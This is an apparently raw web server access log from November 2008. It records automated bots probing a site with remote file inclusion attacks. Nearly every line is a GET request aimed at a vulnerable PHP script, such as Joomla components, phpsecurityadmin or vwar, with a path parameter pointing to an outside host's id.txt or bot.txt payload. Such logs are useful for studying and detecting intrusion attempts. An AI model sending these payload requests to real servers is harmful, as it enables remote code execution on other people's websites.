85.119.152.5 - - [10/Nov/2008:08:22:45 -0800] "GET /?board=free&act=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 200 94978 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:22:47 -0800] "GET /logs/?board=free&act=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 200 72994 "-" "libwww-perl/5.48" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:23:02 -0800] "GET /logs/access_081027.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:23:11 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:23:11 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:23:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:23:15 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:23:22 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:23:22 -0800] "GET /vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:23:22 -0800] "GET /logs//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:23:31 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:24:11 -0800] "GET /logs/access_080901.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:24:13 -0800] "GET /logs/access_081018.log//yabbse/Sources/Packages.php?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:24:13 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:24:13 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:24:19 -0800] "GET /logs/access_080901.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:08:24:29 -0800] "GET /logs/access_071222.log//components/errors.php?error=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:24:30 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:24:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:24:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:08:24:32 -0800] "GET /default.php?page=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:08:24:33 -0800] "GET /logs/access_080502.log//components/errors.php?error=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.27.28.34 - - [10/Nov/2008:08:24:34 -0800] "GET /logs/access_080414.log HTTP/1.1" 200 1336556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:24:37 -0800] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:24:37 -0800] "GET /common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:24:38 -0800] "GET /logs//common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:24:40 -0800] "GET /logs/access_081101.log/?board=free&act=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.27.28.34 - - [10/Nov/2008:08:24:42 -0800] "GET /logs/access_080619.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.44.238.31 - - [10/Nov/2008:08:25:08 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.44.238.31 - - [10/Nov/2008:08:25:08 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:25 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:25 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:25 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:26 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:26 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:26 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:27 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:27 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:27 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:34 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:34 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:25:34 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
64.69.44.43 - - [10/Nov/2008:08:25:36 -0800] "GET /logs/access_080801.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.131.17 - - [10/Nov/2008:08:25:49 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:25:54 -0800] "GET /logs/access_080725.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:25:54 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:25:56 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 200 95180 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:26:05 -0800] "GET /logs/access_080827.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:26:05 -0800] "GET /logs/access_080827.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:26:05 -0800] "GET /logs/access_080827.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:26:09 -0800] "GET /logs/access_080827.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:26:11 -0800] "GET /vwar/backup/errors.php?error=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:26:11 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:26:11 -0800] "GET /logs//vwar/backup/errors.php?error=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:26:16 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:26:34 -0800] "GET /logs/access_080929.log//common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:37 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:37 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:39 -0800] "GET /?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 200 94781 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:39 -0800] "GET /?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 200 94765 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:40 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 200 73026 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:26:40 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 200 73026 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:26:45 -0800] "GET /logs//common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:26:46 -0800] "GET /common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:26:46 -0800] "GET /logs//common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:26:46 -0800] "GET /common/db.php?commonpath=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:26:56 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:26:56 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:26:56 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:26:56 -0800] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:27:06 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:27:06 -0800] "GET /errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:27:06 -0800] "GET /logs/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:27:08 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:20 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:21 -0800] "GET /vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:21 -0800] "GET /logs//vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:27:33 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:27:33 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:27:33 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:27:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 94772 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:42 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:42 -0800] "GET /lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:27:42 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:27:43 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:27:45 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:27:45 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:27:45 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:27:46 -0800] "GET /logs/access_081004.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:27:58 -0800] "GET /logs/access_080831.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:04 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:04 -0800] "GET /logs/access_080222.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:04 -0800] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:05 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:06 -0800] "GET /logs/access_080222.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:07 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:07 -0800] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:28:07 -0800] "GET /logs/access_080925.log/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:28:07 -0800] "GET /includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:28:07 -0800] "GET /logs/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:28:14 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:28:14 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:28:14 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:28:14 -0800] "GET /logs/access_081004.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:28:15 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:28:15 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:28:15 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:28:15 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:28:18 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:28:19 -0800] "GET /lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:28:20 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:28:23 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:28:26 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
